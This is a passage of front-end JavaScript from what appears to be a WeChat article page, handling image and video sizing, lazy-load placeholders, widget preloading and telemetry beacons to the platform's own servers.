      ratio_ = dom.getAttribute('data-ratio') * 1 || 4 / 3,
      arr = [4 / 3, 16 / 9],
      ret = arr[0],
      abs = Math.abs(ret - ratio_);
    for (var j = 1, jl = arr.length; j < jl; j++) {
      var _abs = Math.abs(arr[j] - ratio_);
      if (_abs < abs) {
        abs = _abs;
        ret = arr[j];
      }
    }
    ratio_ = ret;
    var parent_width = getParentWidth(dom) || max_width,
      rwidth = width > parent_width ? parent_width : width,
      outerW = getOuterW(dom) || 0,
      outerH = getOuterH(dom) || 0,
      videoW = rwidth - outerW,
      videoH = videoW / ratio_,
      speedDotH = 12,
      rheight = videoH + outerH + speedDotH;
    return {
      w: Math.ceil(rwidth),
      h: Math.ceil(rheight),
      vh: videoH,
      vw: videoW,
      ratio: ratio_,
      sdh: speedDotH
    };
  }

  
  function setImgSize(item, widthNum, widthUnit, ratio, breakParentWidth) {
    var imgPaddingBorder = getOuterW(item) || 0;
    var imgPaddingBorderTopBottom = getOuterH(item) || 0;
    if (widthNum > getParentWidth(item) && !breakParentWidth) {
      widthNum = getParentWidth(item);
    }
    var heightNum = (widthNum - imgPaddingBorder) * ratio + imgPaddingBorderTopBottom;
    widthNum !== 'auto' && (item.style.cssText += ";width: ".concat(widthNum).concat(widthUnit, " !important;"));
    widthNum !== 'auto' && (item.style.cssText += ";height: ".concat(heightNum).concat(widthUnit, " !important;"));
  }

  var isAccessibilityKey = 'isMpUserAccessibility';
  var imgPlaceholderClass = 'js_img_placeholder';
  var isAccessMode = window.localStorage.getItem(isAccessibilityKey);
  var imgSizeData;
  var validArr = ',' + [0.875, 1, 1.125, 1.25, 1.375].join(',') + ',';
  var match = window.location.href.match(/winzoom=(\d+(?:\.\d+)?)/);
  if (match && match[1]) {
    var winzoom = parseFloat(match[1]);
    if (validArr.indexOf(',' + winzoom + ',') >= 0) ;
  }
  function getImgSrcMainInfo(src) {
    var pathName = new URL(src).pathname;
    var lastIndex = pathName.lastIndexOf('/');
    return lastIndex > 0 ? pathName.slice(0, lastIndex) : pathName;
  }
  function ajax(obj) {
    var url = obj.url;
    var xhr = new XMLHttpRequest();
    var data = null;
    if (_typeof(obj.data) === 'object') {
      var d = obj.data;
      data = [];
      for (var k in d) {
        if (d.hasOwnProperty(k)) {
          data.push(k + '=' + encodeURIComponent(d[k]));
        }
      }
      data = data.join('&');
    } else {
      data = typeof obj.data === 'string' ? obj.data : null;
    }
    xhr.open('POST', url, true);
    xhr.onreadystatechange = function () {
      if (xhr.readyState === 4) {
        if (xhr.status >= 200 && xhr.status < 400) {
          obj.success && obj.success(xhr.responseText);
        } else {
          obj.error && obj.error(xhr);
        }
        obj.complete && obj.complete();
        obj.complete = null;
      }
    };
    xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=UTF-8');
    xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
    xhr.send(data);
  }
  function setSize(images, videos, data) {
    var noWidth = !document.body.clientWidth || !document.getElementById('img-content') || !document.getElementById('img-content').offsetWidth;
    var _loop = function _loop() {
        if (noWidth) {
          return 0;
        }
        if (window.__second_open__ && videos[vi].getAttribute('__sec_open_place_holder__')) {
          return 1;
        }
        var a = videos[vi];
        var src_ = a.getAttribute('src') || a.getAttribute('data-src') || '';
        var vid = getQuery(src_).vid || a.getAttribute('data-mpvid');
        if (!vid) {
          return 1;
        }
        vid = vid.replace(/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g, '');
        a.removeAttribute('src');
        a.style.display = 'none';
        var obj = getVideoWh(a);
        var videoPlaceHolderSpan = document.createElement('span');
        videoPlaceHolderSpan.className = "".concat(imgPlaceholderClass, " wx_widget_placeholder");
        videoPlaceHolderSpan.setAttribute('data-vid', vid);
        videoPlaceHolderSpan.innerHTML = '';
        videoPlaceHolderSpan.style.cssText = "width: " + obj.w + "px !important;";
        insertAfter(videoPlaceHolderSpan, a);

        a.style.cssText += ';width: ' + obj.w + 'px !important;';
        a.setAttribute('width', obj.w);
        {
          videoPlaceHolderSpan.style.cssText += 'height: ' + (obj.h - obj.sdh) + 'px !important;margin-bottom: ' + obj.sdh + 'px !important;';
          a.style.cssText += 'height: ' + obj.h + 'px !important;';
          a.setAttribute('height', obj.h);
        }
        a.setAttribute('data-vh', obj.vh);
        a.setAttribute('data-vw', obj.vw);
        a.setAttribute('data-src', 'https://v.qq.com/iframe/player.html?vid=' + vid + '&width=' + obj.vw + '&height=' + obj.vh + '&auto=0');
        a.setAttribute('__sec_open_place_holder__', true);
        a.parentNode;
        var index = vi;
        var mid = window.dataaaa.mid;
        var biz = window.dataaaa.bizuin;
        var idx = window.dataaaa.idx;
        ajax({
          url: "/mp/videoplayer?vid=".concat(vid, "&mid=").concat(mid, "&idx=").concat(idx, "&__biz=").concat(biz, "&f=json"),
          type: 'GET',
          dataType: 'json',
          success: function success() {
            var json = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
            var ret = JSON.parse(json);
            var ori = ret.ori_status;
            var hitBizHeadimg = ret.hit_biz_headimg + '/64';
            var hitNickname = ret.hit_nickname;
            var hitUsername = ret.hit_username;
            if (ori === 2 && hitUsername !== data.user_name) {
              var videoBar = document.createElement('div');
              videoBar.innerHTML = "
") + '
以下视频来源于
' + '
' + "
") + "
".concat(hitNickname, "
") + '' + '
' + '
' + '
';
              document.querySelectorAll('.video_iframe').forEach(function (item) {
                if (item.getAttribute('data-mpvid') === vid && item.getAttribute('data-hasSource') !== '1') {
                  item.setAttribute('data-hasSource', 1);
                  item.parentNode.insertBefore(videoBar, item);
                }
              });

              var avatorEle = document.getElementById(vid + index);
              var avatorSrc = avatorEle.dataset.src;
              console.log('avatorSrc' + avatorSrc);
              if (ret.hit_biz_headimg) {
                avatorEle.style.backgroundImage = "url(".concat(avatorSrc, ")");
              }
            }
          },
          error: function error(xhr) {}
        });
      },
      _ret;
    for (var vi = 0, viLen = videos.length; vi < viLen; vi++) {
      _ret = _loop();
      if (_ret === 0) break;
      if (_ret === 1) continue;
    }
    var isCarton = data.copyright_info.is_cartoon_copyright * 1 || data.user_info.is_care_mode * 1 || isAccessMode === '1';
    var max_width = getMaxWith();
    if (!imgSizeData) {
      imgSizeData = {};
      data.picture_page_info_list = data.picture_page_info_list || [];
      var noWidthHeightCount = 0;
      var hasWidthHeightCount = 0;
      data.picture_page_info_list.forEach(function (imgData) {
        try {
          var width = Number(imgData.width);
          var height = Number(imgData.height);
          if (width && height) {
            imgSizeData[getImgSrcMainInfo(imgData.cdn_url)] = {
              ratio: height / width,
              width: width
            };
            hasWidthHeightCount++;
          } else {
            noWidthHeightCount++;
          }
        } catch (err) {
          console.error(err);
        }
      });
      if (Math.random() < 0.01 && Number(data.create_timestamp) > 1682352000) {
        hasWidthHeightCount && (new Image().src = "//mp.weixin.qq.com/mp/jsmonitor?idkey=330742_20_".concat(hasWidthHeightCount, "&r=").concat(Math.random()));
        noWidthHeightCount && (new Image().src = "//mp.weixin.qq.com/mp/jsmonitor?idkey=330742_21_".concat(noWidthHeightCount, "&r=").concat(Math.random()));
        if (!data.picture_page_info_list.length) {
          setTimeout(function () {
            noWidthHeightCount = document.querySelectorAll('#js_content img').length;
            noWidthHeightCount && (new Image().src = "//mp.weixin.qq.com/mp/jsmonitor?idkey=330742_21_".concat(noWidthHeightCount, "&r=").concat(Math.random()));
          }, 300);
        }
      }
    }
    for (var im = 0, imLen = images.length; im < imLen; im++) {
      if (window.__second_open__ && images[im].getAttribute('__sec_open_place_holder__')) {
        continue;
      }
      var img = images[im];
      var imgDataSrc = img.getAttribute('data-src');
      var realSrc = img.getAttribute('src');
      if (!imgDataSrc || realSrc) continue;

      var imgStyle = img.getAttribute('style');
      img.setAttribute('data-original-style', imgStyle);
      var width_ = img.dataset.w;
      var imgRatio = 1 * img.dataset.ratio;
      img.setAttribute('data-index', im);
      var width_num = 0;
      var width_unit = 'px';
      try {
        var imgSizeFromBackend = imgSizeData[getImgSrcMainInfo(imgDataSrc)];
        if (imgSizeFromBackend) {
          if (imgSizeFromBackend.ratio) {
            imgRatio = imgSizeFromBackend.ratio;
            img.setAttribute('data-ratio', imgSizeFromBackend.ratio);
          }
          if (imgSizeFromBackend.width) {
            width_ = imgSizeFromBackend.width;
            img.setAttribute('data-w', imgSizeFromBackend.width);
          }
        }
      } catch (err) {
        console.error(err);
      }
      if (imgRatio && imgRatio > 0) {
        if (!isCarton) {
          img.src = "data:image/svg+xml,%3C%3Fxml version='1.0' encoding='UTF-8'%3F%3E%3Csvg width='1px' height='1px' viewBox='0 0 1 1' version='1.1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink'%3E%3Ctitle%3E%3C/title%3E%3Cg stroke='none' stroke-width='1' fill='none' fill-rule='evenodd' fill-opacity='0'%3E%3Cg transform='translate(-249.000000, -126.000000)' fill='%23FFFFFF'%3E%3Crect x='249' y='126' width='1' height='1'%3E%3C/rect%3E%3C/g%3E%3C/g%3E%3C/svg%3E";
          if (noWidth) {
            var fallbackWidth = img.style.width || img.getAttribute('width') || width_;
            var fallbackMaxWidth = 360;

            fallbackWidth = parseFloat(fallbackWidth, 10) > fallbackMaxWidth ? fallbackMaxWidth : fallbackWidth;
            if (fallbackWidth === 'inherit') {
              fallbackWidth = fallbackMaxWidth;
            }
            if (fallbackWidth) {
              img.setAttribute('_width', !isNaN(fallbackWidth * 1) ? fallbackWidth + 'px' : fallbackWidth);
            }
            if (typeof fallbackWidth === 'string' && fallbackWidth.indexOf('%') !== -1) {
              fallbackWidth = parseFloat(fallbackWidth.replace('%', ''), 10) / 100 * fallbackMaxWidth;
            }
            if (fallbackWidth === 'auto') {
              fallbackWidth = width_;
              if (width_ === 'auto' || !width_) {
                fallbackWidth = fallbackMaxWidth;
              } else {
                fallbackWidth = width_;
              }
            }
            var fallbackRes = /^(\d+(?:\.\d+)?)([a-zA-Z%]+)?$/.exec(init_width);
            var fallbackLastWidth = fallbackRes && fallbackRes.length >= 2 ? fallbackRes[1] : 0;
            var fallbackUnit = fallbackRes && fallbackRes.length >= 3 && fallbackRes[2] ? fallbackRes[2] : 'px';
            setImgSize(img, fallbackLastWidth, fallbackUnit, imgRatio, true);
            img.classList.add(imgPlaceholderClass, "wx_img_placeholder");
            continue;
          }
          img.classList.add(imgPlaceholderClass, "wx_img_placeholder");
        }
        var parent_width = getParentWidth(img) || max_width;
        var init_width = img.style.width || img.getAttribute('width') || width_ || parent_width;
        init_width = parseFloat(init_width, 10) > max_width ? max_width : init_width;
        if (init_width === 'inherit') {
          init_width = parent_width;
        }
        if (init_width) {
          img.setAttribute('_width', !isNaN(init_width * 1) ? init_width + 'px' : init_width);
        }
        if (typeof init_width === 'string' && init_width.indexOf('%') !== -1) {
          init_width = parseFloat(init_width.replace('%', ''), 10) / 100 * parent_width;
        }
        if (init_width === 'auto') {
          init_width = width_;
          if (width_ === 'auto' || !width_) {
            init_width = parent_width;
          } else {
            init_width = width_;
          }
        }
        var res = /^(\d+(?:\.\d+)?)([a-zA-Z%]+)?$/.exec(init_width);
        width_num = res && res.length >= 2 ? res[1] : 0;
        width_unit = res && res.length >= 3 && res[2] ? res[2] : 'px';
        var imgWidth = width_num;

        if (isCarton) {
          img.src = imgDataSrc;
          img.style.height = 'auto';
        } else {
          setImgSize(img, imgWidth, width_unit, imgRatio, true);
          setImgSize(img, imgWidth, width_unit, imgRatio, false);
        }
      }
      if (!data.is_h5_render) {
        img.setAttribute('__sec_open_place_holder__', true);
      }
    }
    init();
  }

  var ua = navigator.userAgent;
  /mac\sos/i.test(ua) && !/(iPhone|iPad|iPod|iOS)/i.test(ua) || /windows\snt/i.test(ua);

  var images = document.getElementsByTagName('img');
  var videos = [];

  var user_name = "gh_af700ee13397";
  var isCartoonCopyright = '0';
  var is_care_mode = '';
  var createTimestamp = '1721960546';
  var picturePageInfoList = "[{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8UJLtlViaBMR5IXJwebicib1oKOgzxia1CM4jhQibQ49u5yC71H7UmuiciaEwA/640?wx_fmt=jpeg\x26amp;amp;wxfrom=13','width':'690','height':'536'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8Mv7pC167fsyM7sgmsWnx2uBupQbltEetszw32FAbDMbzJlDe1cMNsg/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'522'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8RdRmIvwvzduTO4uicibsk1VtiagwFtLXLMSb0uU5CAbWibiaP7lWhJJEyMQ/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'521','height':'285'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr85XHPrSD5BibPUwEjBiaqsGqTPuVhH1HE3Tf9FWWB7oVo7pKokmxCRamw/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'290'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8yurjffbOHMBzmnWCP5N2GVkhyellypTiclelkrYUCibT13AXpfa4qJ6g/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'642'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8OKCu71LlnzMvo4UIQnSH5h2sEyzrIYeVibTCicbxyPwUt75WUXND3jcQ/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'373'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8dYTMRCHbUANBFTPWUMEM9ricAdmEWhakfADfhJP6waLibaYXu2l9vCjw/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'286'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8LicaonicMuLclPgZEybxUIVVqAofaV9An3icSLMbnJBYTOrfz8s9WX5Cw/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'334'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8mAmukEDxbVmrUeLTYmgLJuo83LKhNykk0SCeLkKUEKjJ82gicodayHQ/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'304'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr817VRb6ic4ibqficPo93Q67sGbyGKlFKaiayGsqznEx5x7wLtU1qb97yyicQ/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'373'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8ibPhkE3LcGF6Ql5noFdDavALibCQZxnP5aFxSeKibkSI17FIS0btVmE9A/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'578','height':'283'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8e0TmSZ6cIrXPGyCWiaPX6vuALo4o9YWeibr6D1V1rBSL1Mdbic4ian9mqw/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'595','height':'173'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr88MJ6OTtptcZUN4tbQibtSUx8MPLvUGlcjibKRRQjwzUuibbTvia1grianCA/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'430'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8M5vK1KUibibP1YA2FwGHL7hCsFbOG4ymOMEa4zicic6mZhC9nJetbW1E6w/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'321'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8ve9OkL6jQibvfG8XziaXwG6iciabibMc4GlicDPJnQqice41TN4ibtuHhuKia8g/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'381'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8CztcX8qr3NWjEB0Zho3ZcJVtDOUvdvpnchs3YFbkQJcP96z2LuyLxw/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'379'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr86mhb6ZeXBhkiauQw1GjxdsEegJ2Z97WPygAykqAkZbOb94F2wTQX1ibw/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'370'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8hYSXz7fJHgTawMjwTYJCk0zvIe84Ficq6k6yTwo1Y4lEtlY2fo8tlbA/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'370'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8icN4c1DjyrbIkR22uxqAyKwDI9pXweOQg4C2ZhdAkwIxZaYMqA8NPUA/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'376'},{'cdn_url':'https://mmbiz.qpic.cn/sz_mmbiz_jpg/rf8EhNshONSmliateK2H8aA9NObThgQr8iciaWAp588Reg2ChOROPSia0pw9OTJcOf2mwqf9xV9OibrsxIPqE2WuGZg/640?wx_fmt=other\x26amp;amp;tp=webp\x26amp;amp;wxfrom=5\x26amp;amp;wx_lazy=1\x26amp;amp;wx_co=1','width':'690','height':'378'},]";
  picturePageInfoList = picturePageInfoList.includes(',]') ? picturePageInfoList.replace(',]', ']') : picturePageInfoList;
  try {
    picturePageInfoList = JSON.parse(picturePageInfoList.replace(/'/g, '"'));
  } catch (err) {
    picturePageInfoList = [];
    console.error(err);
  }
  var data = {
    is_h5_render: true,
    user_name: user_name,
    copyright_info: {
      is_cartoon_copyright: isCartoonCopyright
    },
    picture_page_info_list: picturePageInfoList,
    create_timestamp: createTimestamp,
    user_info: {
      is_care_mode: is_care_mode
    }
  };
  setSize(images, videos, data);

})();


    
',
    config: [{
      querySelector: 'redpacketcover',
      
      genId: function genId() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return decodeURIComponent(opt.node.getAttribute('data-coveruri') || '');
      },
      
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 0.7854;
      },
      
      calH: function calH() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return this.calW({
          parentWidth: opt.parentWidth
        }) / 0.73346 + 27 + 37;
      },
      replaceContentCssText: '',
      outerContainerLeft: '',
      outerContainerRight: ''
    },
    {
      querySelector: 'mppoi',
      genId: function genId() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.node.getAttribute('data-id') || '';
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 1;
      },
      calH: function calH() {
        return 219;
      },
      replaceContentCssText: '',
      appendContentCssText: 'diplay:block;',
      outerContainerLeft: '',
      outerContainerRight: ''
    },
    {
      querySelector: 'mpsearch',
      genId: function genId() {
        return decodeURIComponent('mp-common-search');
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 1;
      },
      calH: function calH() {
        return 100;
      },
      replaceContentCssText: '',
      appendContentCssText: 'diplay:block;',
      outerContainerLeft: '',
      outerContainerRight: ''
    },
    {
      querySelector: 'mpvideosnap',
      genId: function genId() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var type = opt.node.getAttribute('data-type') || 'video';
        if (type === 'live') {
          return decodeURIComponent(opt.node.getAttribute('data-noticeid') || '');
        }
        return decodeURIComponent(opt.node.getAttribute('data-id') || '');
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var type = opt.node.getAttribute('data-type') || 'video';
        var width = opt.node.getAttribute('data-width') || '';
        var height = opt.node.getAttribute('data-height') || '';
        if (type === 'live' || type === 'topic') {
          return opt.parentWidth;
        }
        var ratio = 1;
        ratio = width / height;
        var computedHeight = 0;
        var computedWidth = 0;
        var isHorizontal = false;
        if (ratio === 1 || ratio === 3 / 4) ; else if (ratio === 4 / 3 || ratio === 16 / 9) {
          isHorizontal = true;
        } else if (ratio < 3 / 4) {
          ratio = 3 / 4;
        } else if (ratio > 1 && ratio < 4 / 3) {
          ratio = 1;
        } else if (ratio > 4 / 3) {
          isHorizontal = true;
        } else if (typeof ratio === 'number' && !Object.is(ratio, NaN)) ; else {
          ratio = 1;
        }
        opt.node.setAttribute('data-ratio', ratio);
        opt.node.setAttribute('data-isHorizontal', isHorizontal);
        if (isHorizontal === true) {
          computedWidth = opt.parentWidth;
        } else {
          if (window.innerWidth < 1024) {
            computedWidth = window.innerWidth * 0.65;
          } else {
            computedWidth = opt.parentWidth * 0.65;
          }
        }
        computedHeight = computedWidth / ratio;
        computedHeight = Math.round(computedHeight);
        computedWidth = Math.round(computedWidth);
        opt.node.setAttribute('data-computedWidth', computedWidth);
        opt.node.setAttribute('data-computedHeight', computedHeight);
        return computedWidth;
      },
      calH: function calH() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var desc = opt.node.getAttribute('data-desc') || '';
        var type = opt.node.getAttribute('data-type') || 'video';
        var computedHeight = opt.node.getAttribute('data-computedHeight') || '';
        switch (type) {
          case 'live':
            return desc ? 152 : 116;
          case 'topic':
            return 201;
          case 'image':
          case 'video':
            return parseFloat(computedHeight);
        }
      },
      getBorderRadius: function getBorderRadius() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var type = opt.node.getAttribute('data-type') || 'video';
        if (type === 'video') {
          return 4;
        }
        return 8;
      },
      replaceContentCssText: '',
      appendContentCssText: 'display:flex;margin:0px auto;',
      outerContainerLeft: '',
      outerContainerRight: ''
    }, {
      querySelector: 'mp-wxaproduct',
      genId: function genId() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return decodeURIComponent(opt.node.getAttribute('data-wxaproduct-productid') || '');
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 1 || '100%';
      },
      calH: function calH() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var cardtype = opt.node.getAttribute('data-wxaproduct-cardtype') || '';
        return cardtype === 'mini' ? 124 : 466;
      },
      replaceContentCssText: '',
      outerContainerLeft: '',
      outerContainerRight: ''
    }, {
      querySelector: 'mpprofile',
      genId: function genId(opt) {
        return opt.node.getAttribute('data-id') || '';
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 1;
      },
      calH: function calH() {
        return 143;
      },
      replaceContentCssText: '',
      appendContentCssText: 'diplay:block;',
      outerContainerLeft: '',
      outerContainerRight: ''
    },
    {
      querySelector: 'mp-common-product',
      genId: function genId(opt) {
        return opt.node.getAttribute('data-windowproduct') || '';
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        return opt.parentWidth * 1 || '100%';
      },
      calH: function calH(opt) {
        var customstyle = opt.node.getAttribute('data-customstyle') || '{}';
        if (customstyle) {
          try {
            var _JSON$parse = JSON.parse(customstyle),
              display = _JSON$parse.display,
              height = _JSON$parse.height;
            if (display !== 'none') {
              var customHeight = height.split('px')[0];
              var ratio = opt.parentWidth / 350.0 || 1;
              customHeight = Math.round(customHeight * ratio);
              return customHeight;
            }
            return 0;
          } catch (err) {
            console.error(err);
          }
        }
        return 0;
      },
      replaceContentCssText: '',
      appendContentCssText: 'diplay:block;',
      outerContainerLeft: '
',
      outerContainerRight: '
'
    }, {
      querySelector: 'mpcps:not([data-templateid="video-play"]),mp-common-cpsad:not([data-templateid="video-play"])',
      genId: function genId(opt) {
        var node = opt.node;
        var planId = node.getAttribute('data-planid');
        var goodId = node.getAttribute('data-pid');
        return goodId || planId || '';
      },
      calW: function calW() {
        var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
        var node = opt.node;
        var templateId = node.getAttribute('data-templateid');
        var adType = node.getAttribute('data-adtype');
        var width = 0;
        if (templateId === 'list') {
          width = '100%';
        } else if (templateId === 'card') {
          if (adType === AD_CONFIG.CPS_GOODS_TYPE.SHORT_PLAY) {
            width = opt.parentWidth ? opt.parentWidth * 0.65 : '100%';
          } else {
            width = '100%';
          }
        }
        return width;
      },
      calH: function calH(opt) {
        var node = opt.node;
        var templateId = node.getAttribute('data-templateid');
        var adType = node.getAttribute('data-adtype');
        var height = 0;
        if (templateId === 'list') {
          height = 120;
        } else if (templateId === 'card') {
          if (adType === AD_CONFIG.CPS_GOODS_TYPE.SHORT_PLAY) {
            var width = opt.parentWidth * 0.65;
            height = Math.ceil(width * (4 / 3)) + 68;
          } else {
            height = Math.ceil(opt.parentWidth + 111);
          }
        }
        return height;
      },
      replaceContentCssText: '',
      appendContentCssText: 'diplay:block;',
      outerContainerLeft: '
',
      outerContainerRight: '
'
    }
    ]
  };
  function preloadingInit() {
    var opt = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : {};
    if (typeof document.querySelectorAll !== 'function') {
      return;
    }
    var g = {
      maxWith: document.getElementById('img-content').getBoundingClientRect().width,
      idAttr: 'data-preloadingid'
    };
    for (var i = 0, il = opt.config.length; i < il; i++) {
      var a = opt.config[i];
      var list = document.querySelectorAll(a.querySelector);
      for (var j = 0, jl = list.length; j < jl; j++) {
        var node = list[j];
        var parentWidth = node.parentNode.getBoundingClientRect().width;
        parentWidth = Math.min(parentWidth, g.maxWith);

        if (node.getAttribute('has-insert-preloading')) {
          continue;
        }
        var nodeW = a.calW({
          parentWidth: parentWidth,
          node: node
        });
        var nodeH = a.calH({
          parentWidth: parentWidth,
          node: node
        });
        var nodeId = a.genId({
          index: j,
          node: node
        });
        var nodeBorderRadius = typeof a.getBorderRadius === 'function' ? a.getBorderRadius({
          index: j,
          node: node
        }) : 8;

        if (typeof nodeW === 'number') {
          nodeW += 'px';
        }
        var imgHtml = opt.defaultContentTpl.replace(/#height#/g, nodeH).replace(/#width#/g, nodeW).replace(/#borderRadius#/g, nodeBorderRadius);
        var tmpNode = document.createElement('div');
        tmpNode.innerHTML = imgHtml;
        if (a.replaceContentCssText) {
          var replaceContentCssText = a.replaceContentCssText.replace(/#height#/g, nodeH).replace(/#width#/g, nodeW);
          tmpNode.firstChild.style.cssText = replaceContentCssText;
        } else if (a.appendContentCssText) {
          tmpNode.firstChild.style.cssText += a.appendContentCssText;
        }
        var html = (a.outerContainerLeft || '') + tmpNode.innerHTML + (a.outerContainerRight || '');
        tmpNode.innerHTML = html;
        tmpNode.firstChild.setAttribute(g.idAttr, nodeId);
        node.parentNode.insertBefore(tmpNode.firstChild, node.nextSibling);
        node.setAttribute('has-insert-preloading', '1');
      }
    }
  }
  function init() {
    preloadingInit(g);
  }

  
  init();

})();